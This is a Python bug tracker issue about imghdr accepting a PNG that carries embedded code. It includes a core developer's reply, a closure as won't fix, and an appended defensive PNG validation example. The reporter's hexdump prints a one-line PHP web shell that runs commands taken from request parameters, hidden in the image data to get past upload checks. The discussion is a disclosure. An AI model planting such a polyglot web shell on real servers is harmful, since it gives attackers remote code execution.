Issue 26337: Bypass imghdr module determines the type of image
Created on 2016-02-11 05:55 by Ramin Farajpour Cami, last changed 2022-04-11 14:58 by admin. This issue is now closed.
Files
File name | Uploaded | Description
phppng.png | Ramin Farajpour Cami, 2016-02-11 05:55 |
Messages (5)
msg260074
Author: Ramin Farajpour Cami (Ramin Farajpour Cami)
Date: 2016-02-11 05:55
import imghdr
imghdr.what('phppng.png')
output : 'png'
if you set javascript script in file .png or .jpg, output: ValueError: invalid \x escape
Hexdump:
root@Ramin:~# hexdump -C phppng.png
00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|
00000010  00 00 00 20 00 00 00 20  08 02 00 00 00 fc 18 ed  |... ... ........|
00000020  a3 00 00 00 09 70 48 59  73 00 00 0e c4 00 00 0e  |.....pHYs.......|
00000030  c4 01 95 2b 0e 1b 00 00  00 60 49 44 41 54 48 89  |...+.....`IDATH.|
00000040  63 5c 3c 3f 3d 24 5f 47  45 54 5b 30 5d 28 24 5f  |c\<?=$_GET[0]($_|   ### Here PHP Code
00000050  50 4f 53 54 5b 31 5d 29  3b 3f 3e 58 80 81 81 c1  |POST[1]);?>X....|
msg260080
Author: Steven D'Aprano (steven.daprano) *
Date: 2016-02-11 09:53
I'm sorry, I don't understand what you think is the bug here. It looks like you are passing a corrupted file which has a PNG extension but is not actually a PNG file (it contains PHP code). What do you expect should happen?
msg260082
Author: Ramin Farajpour Cami (Ramin Farajpour Cami)
Date: 2016-02-11 10:21
Images can be served with a content type of text/html (which means we can certainly inject HTML).
msg260091
Author: Ramin Farajpour Cami (Ramin Farajpour Cami)
Date: 2016-02-11 11:33
Normally, if you choose an image, open the image with an editor and put code into the image, you get an error, but I am able to bypass the image check for upload if I use the imghdr module to check for a valid image: boom, the image is uploaded with malicious code.
msg415047
Author: Irit Katriel (iritkatriel) *
Date: 2022-03-13 17:16
imghdr is deprecated as per PEP 594, so there won't be further enhancements to it.
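The behaviour discussed in this thread, as an added example that is not part of the issue or of CPython: a magic-byte sniff (reimplemented here rather than imported, since imghdr is deprecated) accepts anything that starts with the PNG signature, and even a full chunk and CRC walk accepts a well-formed PNG whose chunk data carries markup. The function names, the `storage_decision` policy and the sample byte strings are constructed for illustration.

```python
import secrets
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def header_only_type(data):
    """Magic-byte sniff: the kind of check a header-based detector performs."""
    return "png" if data.startswith(PNG_SIG) else None

def png_structure_ok(data):
    """Walk all chunks: IHDR first, every CRC valid, IEND last, nothing after it."""
    if not data.startswith(PNG_SIG):
        return False
    pos, first, seen_idat = len(PNG_SIG), True, False
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            return False
        body = data[pos + 8:end - 4]
        if zlib.crc32(ctype + body) != struct.unpack(">I", data[end - 4:end])[0]:
            return False
        if first and (ctype != b"IHDR" or length != 13):
            return False
        first = False
        seen_idat |= ctype == b"IDAT"
        if ctype == b"IEND":
            return length == 0 and seen_idat and end == len(data)
        pos = end
    return False

def storage_decision(client_filename, data):
    """Hypothetical upload policy: the client's name and extension are ignored."""
    if not png_structure_ok(data):
        return None
    return {"stored_name": secrets.token_hex(16) + ".png",
            "headers": {"Content-Type": "image/png",
                        "X-Content-Type-Options": "nosniff"}}

def chunk(ctype, body):
    crc = zlib.crc32(ctype + body)
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

# Constructed samples: harmless marker text stands in for injected content.
IHDR = chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
TAIL = chunk(b"IDAT", zlib.compress(b"\x00\x00")) + chunk(b"IEND", b"")
SIG_PLUS_TEXT = PNG_SIG + b"<p>constructed non-image bytes</p>"
WELL_FORMED_WITH_TEXT = PNG_SIG + IHDR + chunk(b"tEXt", b"Comment\x00<p>constructed</p>") + TAIL
```

The second sample passes every structural check yet still contains markup, so the fixed extension, fixed Content-Type and nosniff header carry the security weight rather than the type detection.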
History
Date | User | Action | Args
2022-04-11 14:58:27 | admin | set | github: 70525
2022-03-13 17:16:22 | iritkatriel | set | status: open -> closed; nosy: + iritkatriel; messages: +; resolution: wont fix; stage: resolved
2016-02-11 11:33:56 | Ramin Farajpour Cami | set | messages: +
2016-02-11 10:21:20 | Ramin Farajpour Cami | set | messages: +
2016-02-11 09:53:16 | steven.daprano | set | nosy: + steven.daprano; messages: +
2016-02-11 08:15:59 | Ramin Farajpour Cami | set | nosy: + serhiy.storchaka
2016-02-11 05:55:17 | Ramin Farajpour Cami | create |